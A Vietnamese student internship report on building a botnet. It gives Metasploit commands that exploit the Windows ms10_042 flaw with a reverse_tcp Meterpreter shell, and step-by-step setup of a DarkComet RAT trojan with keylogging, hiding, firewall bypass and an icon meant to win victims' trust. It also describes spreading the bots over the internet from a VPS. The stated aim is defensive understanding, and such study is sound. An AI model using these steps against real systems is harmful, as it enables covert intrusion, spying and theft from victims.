Upload
long-vu
View
548
Download
6
Embed Size (px)
DESCRIPTION
báo cáo thực tập tốt nghiệp - đề tài triển khai hệ thống zoobies, botnet trên mạng internet
Citation preview
Đại Học Bách Khoa Tp Hồ Chí Minh
Khoa Khoa Học và Kỹ Thuật Máy Tính
BÁO CÁO THỰC TẬP
ĐỀ TÀI: Nghiên cứu và triển khai mạng lưới
zoombie , botnet trên hệ thống mạng.
Tên cơ quan thực tập: Trung Tâm Đào Tạo Quản Trị Và An
Ninh Mạng Athena
Thời gian thực tập: 17/06/2014 đến 04/08/2014
Giảng viên hướng dẫn: Thầy Võ Đỗ Thắng
Sinh viên thực hiện: Vũ Kim Long
Tháng 08 năm 2014
Trang 1
LỜI CẢM ƠN
Khoa Khoa Học và Kỹ Thuật Máy Tính
Em xin chân thành cảm ơn Trường Đại học Bách Khoa Tp HCM và khoa Khoa
học và kỹ thuật máy tính đã tạo điều kiện cho em hoàn thành tốt đợt thực tập tốt
nghiệp này. Tong đợt thực tập này đã cho em những kinh nghiệm quý báo. Những
kinh nghiệm đó sẽ giúp em hoàn thiện hơn trong công việc và môi trường làm việc
sau này.
Em cũng xin cảm ơn quý thầy cô trong khoa đã tận tình giảng dạy và trang bị
cho em những kiến thức cần thiết và hỗ trợ cho em rất nhiều để hoàn thành đề tài
này.
Mặc dù đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất cả nỗ lực
của bản thân, nhưng do trình độ hiểu biết và kinh nghiệm thực tế chắc chắn không
khỏi những thiếu xót nhất định, rất mong nhận được sự thông cảm, chia sẽ và tận
tình để em hoàn thành bản báo cáo thực tập tốt nghiệp tốt hơn.
Một lần nữa em xin chân thành cảm ơn.
Hồ Chí Minh, ngày 02 tháng 08 năm 2014
Sinh viên thực tập
Vũ Kim Long
Trang 2
LỜI CẢM ƠN
Trung Tâm Đào Tạo Quản Trị Và An Ninh Mạng Athena
Trước hết em xin chân thành cảm ơn tất cả các thầy cô tại Trung Tâm Đào
Tạo Athena đã tận tình hướng dẫn em trong quá trình thực tập tại Trung Tâm Đào
Tạo Athena. Bên cạnh đó nhờ có sự giúp đỡ của thầy cô và các bạn cùng khóa, đến
nay em đã hoàn thành xong đề tài: “Nghiên cứu và triển khai mạng lưới zoombie,
botnet trên hệ thống mạng”.
Để có được kết quả này, em xin chân thành cám ơn Thầy Võ Đỗ Thắng đã
quan tâm hướng dẫn cho em trong suốt quá trình hoàn thành đề tài này.
Vì thời gian có hạn cũng như kinh nghiệm còn thiếu nên đề tài của em không
tránh khỏi những thiếu sót. Em rất mong nhận được sự chỉ bảo, đóng góp ý kiến của
thầy để em có điều kiện bổ sung và có thể hoàn thành tốt đề tài của mình hơn.
Chú thích: thầy Võ Đỗ Thắng và sinh viên thực tập Vũ Kim Long.
Sinh viên thực tập
Vũ Kim Long
Trang 3
TRÍCH YẾU
Từ khi ra đời đến nay, internet đã dần khẳng định vị trí vô cùng quan trọng
trong cuộc sống hiện đại của con người. Bên cạnh những thuận lợi vô cùng to lớn
mà internet mang đến, internet cũng mang đến rất nhiều nguy cơ đối với thông tin
mà chúng ta sở hữu. Một trong những nguy cơ nguy hiểm nhất là thiết bị của chúng
ta bị biến thành máy zoombie, bị kiểm soát hoàn toàn bởi các botmaster.
Trong thời gian từ 6 tuần, từ 17/6/2014 đến 4/8/2014, tôi đã thực tập tại
trung tâm đào tạo quản trị và an ninh mạng ATHENA để hoàn thành đề tài “Nghiên
cứu triển khai mạng lưới zoombie, bot net trên hệ thống internet”. Đây là một đề
tài thú vị và rất có ích cho công việc của bản thân tôi. Qua đề tài này, tôi được tiếp
xúc với những công cụ phổ biến và mạnh mẽ trong việc phân tích lỗi bảo mật như
backtrack, metasploit,… từ đó giúp tôi có thêm nhiều kinh nghiệm thực tế rất hữu
ích cho chuyên ngành mà tôi đang theo đuổi.
Tôi cam kết kết quả đạt được do tự tôi thực hiện dưới sự hướng dẫn của thầy
Võ Đỗ Thắng (Giám đốc trung tâm đào tạo Quản trị và An ninh mạng Athena), không
copy của người khác. Các bước thực hiện được tôi ghi lại bằng video.
Chi tiết các clip ghi lại quá trình thực hiện được liệt kê sau đây:
Clip giới thiệu bản thân: http://youtu.be/QVMw8rfaWsI
Clip quá trình triển khai: http://youtu.be/TOZMbnkTUMw
Clip những thuận lợi khó khăn: http://youtu.be/DiPB6Uwt3rg
Trang 4
MỤC LỤC
1 GIỚI THIỆU TỔNG QUAN VỀ TRUNG TÂM ĐÀO TẠO ATHENA ............................. 5
1.1 Sơ lược trung tâm .......................................................................................... 5
1.2 Trụ sở và các chi nhánh và thông tin liên hệ ................................................ 6
1.3 Quá trình hình thành và phát triển ............................................................... 6
1.4 Cơ cấu tổ chức ............................................................................................... 8
1.5 Các dịch vụ hỗ trợ ........................................................................................10
1.6 Đối tác của Athena.......................................................................................10
2 LỜI MỞ ĐẦU .......................................................................................................12
2.1 Giới thiệu đề tài ...........................................................................................12
2.2 Mục tiêu nghiên cứu ....................................................................................12
2.3 Phương pháp nghiên cứu ............................................................................12
2.4 Nội dung đề tài ............................................................................................12
3 GIỚI THIỆU VỀ BACKTRACK 5 .............................................................................13
3.1 Giới thiệu .....................................................................................................13
3.2 Mục đích ......................................................................................................13
3.3 Cài đặt ..........................................................................................................14
4 TRIỂN KHAI TRONG MÔI TRƯỜNG LAN .............................................................18
5 TRIỂN KHAI HỆ THỐNG BOTNET BẰNG DARKCOMET ........................................22
5.1 Darkcomet RAT là gì? Tạo nó thế nào? .......................................................22
5.2 Cài đặt DarkComet .......................................................................................22
6 KẾT LUẬN ............................................................................................................30
7 TÀI LIỆU THAM KHẢO .........................................................................................31
Trang 5
1 GIỚI THIỆU TỔNG QUAN VỀ TRUNG TÂM ĐÀO TẠO ATHENA
1.1 SƠ LƯỢC TRUNG TÂM Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền thân
là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết
tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép
kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04
tháng 11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED.
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt
huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần
vào công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và đang
tập trung chủ yếu vào các họat động sau:
Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các
tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI,
CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao
cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An
, ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..Qua đó cung
cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về
mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh
nghiệp có nhu cầu.
Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản
xuất kinh doanh.
Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở
dữ liệu thông tin về các ứng dụng và sự cố mạng.
Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra
sự cố máy tính.
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là
chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ
ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin
Truyền Thông các tỉnh, bưu điện các tỉnh,…
Trang 6
Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công
nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học
Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an
toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự...
1.2 TRỤ SỞ VÀ CÁC CHI NHÁNH VÀ THÔNG TIN LIÊN HỆ Trụ sở chính
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Cơ sở tại HCM
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam
Thông tin liên hệ
Điện thoại: ( 84-8 ) 3824 4041
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 23 00 99
Website: www.Athena.Edu.Vn
1.3 QUÁ TRÌNH HÌNH THÀNH VÀ PHÁT TRIỂN Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh
vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công
nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có
đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ thông tin
trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ thông tin
trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu
cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công nghệ
thông tin cho đất nước và xã hội.
Các thành viên sáng lập trung tâm gồm:
Trang 7
Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại
là giám đốc dự án của công ty Siemen Telecom.
Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó
Tổng công ty FPT.
Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm
công nghệ thông tin của Ngân hàng.
Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh
mạng Athena.
Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần
100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền
Nam.
Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung
tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài
đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh nghiệp
về các chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử,
bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng kí học.
Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội ngũ
giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông
tin của đất nước nói chung, các doanh nghiệp, cá nhân nói riêng.Năm 2004, công
ty mở rộng hoạt động cung cấp giải pháp, dịch vụ cho khu vực miền Trung thông
qua việc thành lập văn phòng đại diện tại Đà Nẵng.
Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm
một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ
giảng viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và học
viện công nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời gian này
Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ
thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng
viên của trung tâm.
Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên,
cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào
nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi
công ty gây nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi
nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa làm
Trang 8
cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết tâm khôi
phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học hóa của
đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám đốc
và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của
trung tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh
mẽ và một tinh thần thép đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu,
giúp trung tâm đứng vững trong thời kì khủng hoảng.
Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm
đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động
của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào tạo
quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty, tổ
chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân lực
công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến
trình tin học hóa nước nhà.
1.4 CƠ CẤU TỔ CHỨC
Các khóa học của trung tâm Athena
Các khóa học dài hạn
Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
Trang 9
Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician
Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician.
Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager
Administrator
Các khóa học ngắn hạn
Quản trị mạng Microsoft căn bản ACBN .
Phần cứng máy tính, laptop, server .
Quản trị hệ thống mạng Microsoft MCSA Security.
Quản trị mạng Microsoft nâng cao MCSE.
Quản trị window Vista
Quản trị hệ thống Window Server 2008, 2012.
Lớp Master Exchange Mail Server.
Quản trị mạng quốc tế Cissco CCNA.
Quản trị hệ thống mạng Linux 1 và Linux 2.
Khóa thiết kế web và bảo mật mạng
Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart.
Lập trình web với Php và MySQL.
Bảo mật mạng quốc tế ACNS.
Hacker mũ trắng .
Athena Mastering Firewall Security.
Bảo mật website.
Các sản phẩm khác
Chuyên đề thực hành sao lưu và phục hồi dữ liệu.
Chuyên đề thực hành bảo mật mạng Wi_Fi.
Chuyên đề Ghost qua mạng.
Chuyên đề xây dựng và quản trị diễn đàn.
Chuyên đề bảo mật dữ liệu phòng chống nội gián.
Chuyên đề quản lý tài sản công nghệ thông tin .
Chuyên đề kỹ năng thương mại điện tử.
Cơ sở hạ tầng
Trang 10
Thiết bị đầy đủ và hiện đại.
Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công
nghệ mới nhất.
Phòng máy rộng rãi, thoáng mát.
1.5 CÁC DỊCH VỤ HỖ TRỢ Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn.
Giới thiệu việc làm cho mọi học viên.
Thực tập có lương cho học viên khá giỏi.
Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn
thời gian.
Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính,
mạng máy tính, bảo mật mạng.
Hỗ trợ thi Chứng chỉ Quốc tế.
Khách hàng của Athena
Mọi đối tượng chuyên hoặc không chuyên về CNTT.
Khách hàng chủ yếu của ATHENA là các bạn học sinh, sinh viên và các cán bộ công
nhân viên chức yêu thích lĩnh vực công nghệ thông tin.
1.6 ĐỐI TÁC CỦA ATHENA Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự
CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho các đơn
vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính…
Đội ngũ giảng viên của trung tâm đào tạo Athena
Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học
hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc
tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế
(Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều
kiện tham gia giảng dạy tại trung tâm ATHENA.
Trang 11
Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức
công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền
đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA.
Trang 12
2 LỜI MỞ ĐẦU
2.1 GIỚI THIỆU ĐỀ TÀI Botnets – một tập hợp các máy tính đã bị tấn công và cài đặt bí mật các chương
trình độc hại nhằm phục tùng một nhiệm vụ nào đó được điều khiển bởi một cá
nhân hay một băng nhóm tội phạm mạng, Hiện nay botnet đang có xu hướng tăng
mạnh trong vài năm trở lại đây và được coi là mối đe dọa lớn nhất của mạng
Internet. Mạng lưới các hệ thống máy tính bị tấn công có thể thực hiện rất nhiều
hoạt động phạm tội mà chủ sở hữu máy tính không hề hay biết. Botnet cho phép
người điều khiển nó có thể đánh cắp các thông tin cá nhân và thông tin tài chính,
đột nhập vào hệ thống các tài khoản ngân hàng của chủ sở hữu máy tính, đánh cắp
hàng triệu thẻ tín dụng, ngừng hoạt động các website, kiểm soát các hoạt động của
máy tính và có thể bí mật kích hoạt hệ thống camema khiến người dùng có nguy cơ
gặp nguy hiểm.
2.2 MỤC TIÊU NGHIÊN CỨU Nghiên cứu về cách xây dựng mạng lưới zombie, botnet sẽ giúp chúng ta hiểu hơn
về cách hoạt động, từ đó xây dựng các biện pháp phòng ngừa sự phát triển của hệ
thống zombie, botnet.
2.3 PHƯƠNG PHAP NGHIÊN CỨU Đề tài được chia thành 2 giai đoạn:
Giai đoạn 1: Sử dụng máy ảo VMware để mô phỏng môi trường mạng LAN. Cài đặt
Backtrack. Sau đó thực hiện thâm nhập vào máy tính khác.
Giai đoạn 2: Cài đặt và tạo các botnet trên VPS (Virtual Private Server) và phát tán
trên mạng. Sau đó thực hiện xâm nhập, kiểm soát từ xa thông qua địa chỉ IP public
của VPS.
2.4 NỘI DUNG ĐỀ TÀI Đề tài sẽ được trình bày thành 3 phần:
Phần 1: Giới thiệu về Backtrack 5
Phần 2: Triển khai trong môi trường LAN
Trang 13
Phần 3: Triển khai xây dựng hệ thống botnet bằng DarkComet
3 GIỚI THIỆU VỀ BACKTRACK 5
3.1 GIỚI THIỆU BackTrack là một hệ điều hành mà hầu như hacker hay quản trị mạng nào cũng đã
và đang sử dụng. Bên trong nó đã được tích hợp rất nhiều công cụ phục vụ cho
việc kiểm tra và khai thác lỗ hổng bảo mật.
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử
nghiệm thâm nhập. Trong các định dạng Live DVD, bạn sử dụng có thể Backtrack
trực tiếp từ đĩa DVD mà không cần cài nó vào máy của bạn. Backtrack cũng có thể
được cài đặt vào ổ cứng và sử dụng như một hệ điều hành.
Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập
thử nghiệm -IWHAX, WHOPPIX, và Auditor
3.2 MỤC ĐÍCH Backtrack 5 có các công cụ được sử dụng cho quá trình thử nghiệm xâm nhập. Các
công cụ kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như sau:
Information gathering: loại này có chứa một số công cụ có thể được sử dụng để
có được thông tin liên quan đến mục tiêu DNS,định tuyến, địa chỉ email,trang
web,máy chủ mail…Thông tin này được thu thập từ các thông tin có sẵn trên
internet,mà không cần chạm vào môi trường mục tiêu.
Network mapping: loại này chứa một số công cụ có thể được sử dụng để có kiểm
tra các host đang tôn tại,thông tin về OS,ứng dụng được sử dụng bởi mục tiêu,và
cũng làm portscanning.
Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công
cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các
công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network
Management Protocol (SNMP).
Web application analysis: loại này chứa các công cụ có thể được sử dụng trong
theo dõi, giám sát các ứng dụng web.
Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần
số vô tuyến (RFID).
Trang 14
Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ
hổng tìm thấy trong các máy tính mục tiêu.
Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy
tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc
quyền của chúng ta cho các đặc quyền cao nhất.
Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy
trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được
những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì
quyền truy cập.
Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong
thể loại này.
Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể
được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc
các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong
thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi
động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao
đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.
Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối
chương trình một hoặc tháo rời một tập tin thực thi.
3.3 CÀI ĐẶT
Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack-
linux.org/downloads/, có bản cho Vmware và file ISO.
Live DVD
Nếu chúng tamuốn sử dụng Backtrack mà không cần cài nó vào ổ cứng, chúng ta
có thể ghi tập tin ảnh ISO vào đĩa DVD, và khởi động máy tính của chúng ta với
DVD. Backtrack sau đó sẽ chạy từ đĩa DVD. Lợi thế của việc sử dụng Backtrack là
một DVD Live là nó là rất dễ dàng để làm và chúng ta không cần phải gây rối với
cấu hình máy hiện tại của chúng ta. Tuy nhiên, phương pháp này cũng có một số
nhược điểm. Backtrack có thể không làm việc với phần cứng, và thay đổi cấu hình
nào được thực hiện trên phần cứng để làm việc sẽ không được lưu với đĩa DVD
Live. Ngoài ra, nó là chậm, vì máy tính cần phải tải các chương trình từ đĩa DVD.
Trang 15
Install
Cài đặt trong máy thật
Chúng ta cần chuẩn bị một phân vùng để cài đặt Backtrack. Sau đó chạy Backtrack
Live DVD. Khi gặp màn hình login, ta sử dụng username là root, pass là toor. Sau đó
để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ họa của Backtrack 5.
Để cài đặt Backtrack 5 đến đĩa cứng ta chọn tập tin có tên install.sh trên desktop
và tiến hành cài đặt. Tuy nhiên, nếu không thể tìm thấy tập tin, chúng ta có thể sử
dụng ubiquity để cài đặt. Để sử dụng ubiquity, ta mở Terminal gõ ubiquity. Sau đó
cửa sổ cài đặt sẽ hiển thị. Sau đó trả lời 1 số câu hỏi như thành phố chúng ta đang
sống, keyboard layout, phân vùng ổ đĩa cài đặt,… Sau đó tiến hành cài đặt.
Cài đặt trong máy ảo
Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và sử dụng
đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng được wireless
trừ USB wireless.
Ta có thể có thể sử dụng file VMWare được cung cấp bởi BackTrack. Từ đây chúng
ta có BackTrack trên máy ảo thật dễ dàng và nhanh chóng. Cấu hình trong file
VMWare là memory 768MB, hardisk: 30GB, Network: NAT. Để sử dụng được card
mạng thật, ta phải chọn Netword là Briged
Các bước cài đặt
Từ thẻ Home của Vmware ta chọn Create a New Virtual Machine để tạo 1 máy ảo
mới
Trang 16
Cho đĩa Backtrack vào:
Gõ startx để vào chế độ đồ họa trong BackTrack
Trang 17
Để cài đặt, click chọn vào file Install BackTrack trên màn hình Desktop
Sau khi hoàn tất các bước chọn phân vùng cài đặt, ngôn ngữ, múi giờ ta khởi động
lại để vào Backtrack.
Khi vào Backtrack ta đăng nhập với user là root và passwork là toor. Rồi sau đó
nhấn startx để vào giao diện đồ họa.
Trang 18
4 TRIỂN KHAI TRONG MÔI TRƯỜNG LAN
Trong Backtrack5r3, chúng ta sử dụng công cụ Metasploit để thực hiện xâm nhập.
Để khởi động Metasploit, trong cửa sổ Terminal, gõ lệnh msfconsole.
Trong phần này chúng ta sẽ sử dụng công cụ metasploit để khai thác các lỗ hỏng
window thông qua mạng LAN.
Khai thác lỗi ms10_042
Trang 19
Sử dụng lệnh search ms10_042 để tìm ra moudle cần dùng
Tiếp theo ta nhập lệnh:
use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec
Các thiết lập:
Trang 20
Sau đó ta thiết lập 1 số thông số để thâm nhập, ta gõ lần lượt các lệnh sau:
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST [IP]
set LHOST [IP]
Trong đó IP là IP của host Backtrack ta đang cài đặt. Cuối cùng sau khi đã thiết lập
xong ta gõ lệnh:
exploit
Trang 21
Sau khi exploit, Metasploit sẽ tạo một link chứa mã độc với địa chỉ là host ta đang
cài đặt (ví dụ http://192.168.1.101:80/), khi nạn nhân truy cập vào địa chỉ có mã
độc thì nạn nhân sẽ bị thâm nhập vào hệ thống máy tính.
Trang 22
5 TRIỂN KHAI HỆ THỐNG BOTNET BẰNG DARKCOMET
5.1 DARKCOMET RAT LÀ GÌ? TẠO NÓ THẾ NÀO? Darkcomet là một công cụ tạo Trojan giống Spynet, nhưng nguy hiểm hơn nhiều.
Nếu bạn không biết Darkcomet RAT nguy hiểm hơn ở chỗ nào, thì đây là 1 vài ví
dụ:
Darkcomet RAT có thể vượt được tường lửa và Antivirus. Mọi Antivirus đều có thể
bị vô hiệu hóa bởi Darkcomet. Ngay cả Task Manager cũng có thể bị Darkcomet
RAT vô hiệu hóa. Nếu máy bạn bị dính Darkcomet RAT, bạn có thể mất sạch tất cả
tài liệu trong 1 giây.
Darkcomet RAT có các chức năng như Spynet: Xem trộm webcam, nghe lén Voice, Điều khiển máy tính, trao đổi file, vv… Qua đó ta có thể thấy Dark Comet là một công cụ vô cùng lợi hại và nguy hiểm.
Dự án DarkComet RAT đã phát hành bản chính thức cuối cùng là DarkComet RAT
v5.4.1 Legacy vào ngày 1/10/2012.
5.2 CÀI ĐẶT DARKCOMET Bản darkcomet dùng trong báo cáo được tải từ:
http://www.mediafire.com/download/37bd1c0acbd2p6c/darkcomet+5.3.1.rar.
Chạy DarkComet trên linux:
Tải bản DarkComet về, giải nén vào thư mục darkcomet5.3.1 dùng lệnh:
unzip e darkcomet5.3.1.rar.
Mở terminal, chuyển thư mục làm việc hiện hành về darkcomet5.3.1.
Để khởi động DarkComet ta dùng lệnh: wine darkcomet
Trang 23
Giao diện quản lí các bot của DarkComet, chờ đợi các kết nối tới:
Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to new
port(+Listen)
Điền cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận
Giao diện thêm socket lắng nghe
Ta có thể thêm cổng lắng nghe khác nếu muốn.
Trang 24
Tạo trojan:
Trojan có thể được tạo từ bất kì máy windows nào. Các bước tạo trojan ta thực
hiện lại các bước tương tự như trên. Sau khi giải nén ta vào thư mực giải nén chạy
file darkcomet.exe
Chúng ta c ó 2 tùy chọn. chọn option của trojan theo mặc định (DarkComet ->
Server module -> Minimalist) hoặc tùy chọn (DarkComet -> Server module -> Full
Editor)
Giao diện tùy chọn:
Trang 25
Các cài đặt:
Main settings ta lần lượt thiết lập Password, server ID, profile name và tùy
chọn bypass tường lửa.
Network Settings cài đặt IP sẽ lắng nghe các bot và cổng lắng nghe của server.
Trang 26
Module Startup tùy chọn bot có khởi động cùng Windows hay không.
Trang 27
Install Message hiển thị hộp thoại thông báo và nội dung khi nạn nhân chạy chương trình bot hay không
Module Shield các tùy chọn giúp bot ẩn
Keylogger tùy chọn ghi log bàn phím, địa chỉ tải log.
Trang 28
File Binder tùy chọn đính kèm file khác.
Choose Icon tùy chọn một icon để tạo sự tin tưởng cho nạn nhân.
Trang 29
Stub Finalization tùy chọn định dạng xuất file trojan (.exe, .com, .bat, .pif,
.scr), tùy chọn cách nén file trojan và lưu các cài đặt để sử dụng lại.
Sau khi đã cài đặt xong các tùy chọn, chọn Build The Stub và chọn nơi lưu để tạo
trojan.
Trang 30
Giao diện quản lí users:
Giao diện điều khiển user:
6 KẾT LUẬN
Tấn công từ chối dịch vụ và các mạng máy tính ma (Botnet) đang có xu hướng tăng
nhanh trên thế giới cũng như tại Việt Nam trong vài năm trở lại đây. Điều này đang
Trang 31
đặt ra cho các cơ quan chức năng yêu cầu cấp bách về việc đề ra các giải pháp phối
hợp phòng chống botnet và DDoS tại Việt Nam. Tìm hiểu về mạng lưới zombie,
botnet rất có ích cho người dùng phổ thông, giúp hạn chế nguy cơ bị biến thành
botnet. Đề tài này càng có ít cho người quản trị hệ thống, giúp hiểu rõ cơ chế hoạt
động của mạng lưới zombie, botnet, từ đó đề ra các biện pháp phòng ngừa thích
hợp.
7 TÀI LIỆU THAM KHẢO
